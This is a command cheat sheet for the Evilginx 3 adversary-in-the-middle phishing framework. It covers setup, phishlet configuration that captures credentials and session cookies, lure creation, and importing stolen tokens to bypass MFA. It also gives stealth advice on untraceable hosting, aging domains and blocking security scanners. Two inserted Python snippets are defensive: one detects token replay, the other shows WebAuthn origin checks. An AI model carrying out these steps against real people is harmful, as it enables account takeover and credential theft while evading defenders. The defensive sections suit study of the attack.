Evilginx3 Commands
Evilginx 3 is an adversary-in-the-middle (AiTM) attack framework that acts as a reverse proxy between the victim and legitimate websites, capturing credentials and session tokens in real time, including bypassing multi-factor authentication.
Installation
# Install Go (required)
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.22.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Clone and build Evilginx 3
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
# Or install via Go
go install github.com/kgretzky/evilginx2@latest
# Run (requires root for port 443)
sudo ./evilginx -p ./phishlets
Initial configuration
DNS configuration
# Before running Evilginx, configure DNS records:
# 1. Register a domain (e.g., example-login.com)
# 2. Point the domain's nameservers to your Evilginx server
# Required DNS records (set at registrar or DNS provider):
# A record: example-login.com -> YOUR_SERVER_IP
# A record: *.example-login.com -> YOUR_SERVER_IP
# Evilginx will auto-provision Let's Encrypt certificates
Server configuration
# In the Evilginx console:
# Set the server's external IP
config ipv4 external YOUR_SERVER_IP
# Set the phishing domain
config domain example-login.com
# Set the redirect URL (where to send non-phishing traffic)
config redirect_url https://www.wikipedia.org
# View current configuration
config
Phishlets
Listing and loading phishlets
# List available phishlets
phishlets
# View details of a specific phishlet
phishlets get-hosts o365
# Enable a phishlet
phishlets enable o365
# Disable a phishlet
phishlets disable o365
# Set hostname for a phishlet
phishlets hostname o365 login.example-login.com
Phishlet structure
# Example phishlet YAML structure (simplified)
# Located in ./phishlets/example.yaml
name: 'example'
author: 'author'
min_ver: '3.0.0'
proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'example.com'
    session: true
    is_landing: true
  - phish_sub: 'api'
    orig_sub: 'api'
    domain: 'example.com'
sub_filters:
  - triggers_on: 'login.example.com'
    orig_sub: 'login'
    domain: 'example.com'
    search: 'example.com'
    replace: '{hostname}'
    mimes: ['text/html', 'application/javascript']
auth_tokens:
  - domain: '.example.com'
    keys: ['session_token', 'auth_cookie']
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.example.com'
  path: '/authenticate'
Lures
Creating lures
# Create a lure for a phishlet
lures create o365
# List all lures
lures
# Get the phishing URL for a lure
lures get-url 0
# Set a custom redirect URL after capture
lures edit 0 redirect_url https://legitimate-site.com/dashboard
# Set a custom path for the lure
lures edit 0 path /meeting-invite
# Add URL parameters
lures edit 0 params "ref=email&id=12345"
# Set a pause duration (delay before redirect)
lures edit 0 pause 2
Lure customization
# Set a custom user-agent filter
lures edit 0 ua_filter "Mozilla"
# Set referrer filter (only allow clicks from specific sources)
lures edit 0 referrer "https://outlook.office.com"
# Generate shortened/obfuscated URL
lures get-url 0
# Delete a lure
lures delete 0
Sessions
Viewing captured sessions
# List all captured sessions
sessions
# View details of a specific session
sessions 0
# Session details include:
# - Captured username and password
# - Session cookies/tokens
# - IP address and user agent
# - Timestamp
# - Phishlet used
# Delete a session
sessions delete 0
# Delete all sessions
sessions delete all
Token extraction
# View captured cookies for a session
sessions 0
# Tokens are displayed as JSON, ready to import into browser
# Use browser developer tools or a cookie editor extension to import:
# 1. Open browser DevTools > Application > Cookies
# 2. Or use "EditThisCookie" extension
# 3. Import the captured token values
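The captured tokens above are only useful to an attacker once replayed from a different browser, which is the observable a defender can key on. The following detection sketch is an added example (not part of Evilginx or this cheat sheet): it parses constructed IdP-style log lines (an assumed format) and flags a session identifier that is reused from a different IP and user agent shortly after issuance.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines in an assumed format: timestamp, event, sid, ip, ua.
# Note that during an AiTM phish the login itself arrives from the proxy server's IP,
# so the baseline (ip, ua) recorded at login belongs to the proxy, not the victim.
SAMPLE_LOG = """\
2024-05-01T09:00:00Z login_success sid=abc123 ip=203.0.113.10 ua=Mozilla/5.0 (Windows NT 10.0) Chrome/124
2024-05-01T09:00:05Z request sid=abc123 ip=203.0.113.10 ua=Mozilla/5.0 (Windows NT 10.0) Chrome/124
2024-05-01T09:03:40Z request sid=abc123 ip=198.51.100.77 ua=Mozilla/5.0 (X11; Linux x86_64) Firefox/125
2024-05-01T09:10:00Z login_success sid=def456 ip=192.0.2.20 ua=Mozilla/5.0 (Macintosh) Safari/17
2024-05-01T09:12:00Z request sid=def456 ip=192.0.2.20 ua=Mozilla/5.0 (Macintosh) Safari/17
"""

LINE_RE = re.compile(r"^(\S+) (\S+) sid=(\S+) ip=(\S+) ua=(.*)$")
REPLAY_WINDOW = timedelta(minutes=30)  # assumed: how soon after login a switch is suspicious


def parse_line(line: str) -> dict:
    ts, event, sid, ip, ua = LINE_RE.match(line).groups()
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "event": event, "sid": sid, "ip": ip, "ua": ua}


def detect_session_replay(log_text: str) -> list:
    """Return alerts for session IDs used from a different (ip, ua) than at login."""
    baseline = {}  # sid -> (ts, ip, ua) recorded at login_success
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec["event"] == "login_success":
            baseline[rec["sid"]] = (rec["ts"], rec["ip"], rec["ua"])
            continue
        if rec["sid"] not in baseline:
            continue
        login_ts, login_ip, login_ua = baseline[rec["sid"]]
        # Both client IP and user agent changed within the window: the token was
        # most likely exported and imported into another browser.
        if (rec["ip"] != login_ip and rec["ua"] != login_ua
                and rec["ts"] - login_ts <= REPLAY_WINDOW):
            alerts.append({"sid": rec["sid"], "login_ip": login_ip,
                           "replay_ip": rec["ip"], "at": rec["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_session_replay(SAMPLE_LOG):
        print("possible session token replay:", alert)
```

In production the user-agent comparison should be relaxed (minor version bumps are normal) and the IP check enriched with ASN or geolocation, since the login IP in an AiTM case is the proxy's hosting provider rather than the victim's network.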
MFA bypass mechanics
How Evilginx bypasses MFA:
1. Victim clicks phishing link
2. Evilginx proxies the real login page to the victim
3. Victim enters credentials -> captured by Evilginx
4. Evilginx forwards credentials to real site
5. Real site prompts for MFA -> proxied to victim
6. Victim completes MFA challenge (push, TOTP, etc.)
7. Real site sets authenticated session cookies
8. Evilginx captures the session cookies
9. Attacker imports session cookies -> authenticated without MFA
What this bypasses:
- SMS/voice OTP
- TOTP authenticator apps
- Push notifications (Authenticator, Duo)
- Email OTP
What this does NOT bypass:
- FIDO2/WebAuthn hardware keys (phishing-resistant)
- Client certificate authentication
- Device-bound passkeys
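Why FIDO2/WebAuthn is listed as not bypassed: the browser writes the origin it actually connected to into clientDataJSON, the authenticator signs over that data, and the relying party rejects any origin or RP ID hash that is not its own; a proxy on another domain therefore cannot produce an assertion the real site will accept. This is an added illustration of those two relying-party checks, not Evilginx code, with constructed sample data and an assumed RP ID of example.com.

```python
import hashlib
import json

RP_ID = "example.com"                    # assumed relying-party ID of the real site
EXPECTED_ORIGIN = "https://login.example.com"


def rp_id_hash(rp_id: str) -> bytes:
    return hashlib.sha256(rp_id.encode("ascii")).digest()


def verify_assertion(client_data_json: bytes, authenticator_data: bytes,
                     expected_origin: str, rp_id: str) -> tuple:
    """Origin and rpIdHash checks of a webauthn.get ceremony; returns (ok, reason).
    Signature verification over authenticatorData || SHA-256(clientDataJSON) is
    omitted here, but it is what stops a proxy from simply rewriting 'origin'."""
    data = json.loads(client_data_json)
    if data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if data.get("origin") != expected_origin:
        return False, "origin mismatch: %r" % data.get("origin")
    # authenticatorData begins with the 32-byte SHA-256 of the RP ID
    if authenticator_data[:32] != rp_id_hash(rp_id):
        return False, "rpIdHash mismatch"
    return True, "ok"


def make_client_data(origin: str) -> bytes:
    # Constructed clientDataJSON; the challenge is a placeholder value
    return json.dumps({"type": "webauthn.get", "challenge": "c2FtcGxlLWNoYWxsZW5nZQ",
                       "origin": origin, "crossOrigin": False}).encode()


# Constructed authenticatorData: rpIdHash, flags byte (UP|UV), 4-byte sign count
AUTH_DATA_REAL = rp_id_hash(RP_ID) + b"\x05" + (1).to_bytes(4, "big")


def direct_login_ok() -> bool:
    return verify_assertion(make_client_data(EXPECTED_ORIGIN), AUTH_DATA_REAL,
                            EXPECTED_ORIGIN, RP_ID)[0]


def proxied_login_ok() -> bool:
    # The victim's browser connected to the proxy's domain, so that is the origin
    # it records (in practice the browser would already refuse, since example.com
    # is not a registrable suffix of example-login.com).
    return verify_assertion(make_client_data("https://login.example-login.com"),
                            AUTH_DATA_REAL, EXPECTED_ORIGIN, RP_ID)[0]


if __name__ == "__main__":
    print("direct:", direct_login_ok(), "proxied:", proxied_login_ok())
```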
Proxy configuration
# Evilginx acts as a TLS-terminating reverse proxy:
#
# Victim <-> Evilginx (your domain + cert) <-> Real Website
#
# Traffic flow:
# 1. Victim connects to login.example-login.com (your domain)
# 2. Evilginx terminates TLS with Let's Encrypt cert
# 3. Evilginx proxies request to real login.example.com
# 4. Response is modified (domain replacements) and sent to victim
# 5. Victim sees legitimate-looking page on your domain
# Configure TLS certificate behavior
config autocert true
# Blacklist mode (block bots, scanners)
blacklist unauth
# View blacklisted IPs
blacklist
Redirect rules
# Configure what happens to non-targeted visitors
config redirect_url https://www.wikipedia.org
# Lure-specific redirects (after credential capture)
lures edit 0 redirect_url https://real-site.com/login?error=session_expired
# The redirect URL should look legitimate:
# - Real login page with "session expired" message
# - Password reset confirmation page
# - Generic "meeting has ended" page
# Redirect on invalid path
# Non-lure URLs automatically redirect to config redirect_url
OPSEC and stealth
# Recommended operational security practices:
# 1. Use a clean VPS with no ties to your identity
# 2. Register domain through privacy-protected registrar
# 3. Age the domain before use (domain reputation)
# 4. Use CloudFlare or similar CDN to hide server IP
# 5. Set strict user-agent filtering on lures
# 6. Monitor and rotate domains after use
# 7. Enable blacklisting of known security scanners
# 8. Set kill dates on phishing campaigns
# 9. Clean up all artifacts after engagement
# Blacklist known security crawlers
blacklist unauth
# Use a custom landing page for non-targeted traffic
config redirect_url https://www.example.com
Logging and monitoring
# Evilginx logs all activity to the console and log files
# View real-time activity
# (visible in the Evilginx console as events happen)
# Session data is stored in:
# ./data/sessions.json
# Configuration is stored in:
# ./data/config.json
# Monitor for new captures
sessions
# Check periodically or set up alerting
Cleanup
# After an engagement, clean up thoroughly:
# Delete all sessions
sessions delete all
# Delete all lures
lures delete all
# Disable every enabled phishlet (repeat for each one in use)
phishlets disable o365
# Remove the domain configuration
# Decommission the server
# Revoke Let's Encrypt certificates